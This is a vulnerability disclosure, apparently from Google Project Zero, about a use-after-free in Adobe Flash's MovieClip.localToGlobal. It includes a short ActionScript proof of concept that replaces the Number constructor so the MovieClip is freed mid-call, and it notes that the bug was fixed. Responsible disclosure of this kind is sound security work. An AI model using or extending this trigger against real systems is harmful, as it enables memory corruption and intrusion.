Adobe Flash: Use-after-free in MovieClip.localToGlobal

[GoogleCodeExporter]

There is a use-after-free issue in MovieClip.localToGlobal. If the Number 
constructor is overwritten with a new constructor and MovieClip.localToGlobal 
is called with an integer parameter, the new constructor will get called. If 
this constructor frees the MovieClip, a use-after-free occurs. A minimal PoC is 
as follows:

var a = func;
_global.Number = a;
this.createEmptyMovieClip("mc", 1);
mc.localToGlobal( 7 );

function func(){

    mc.removeMovieClip();

        // fix heap here  

        this.x = 2;
    this.y = 1;

    }

A sample swf and fla are attached. 

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 12 Oct 2015 at 11:57

Attachments:

• localtoglobal.fla
• localtoglobal.swf

[GoogleCodeExporter]

Original comment by natashe...@google.com on 17 Dec 2015 at 9:24

• Changed state: Fixed
• Removed labels: Restrict-View-Commit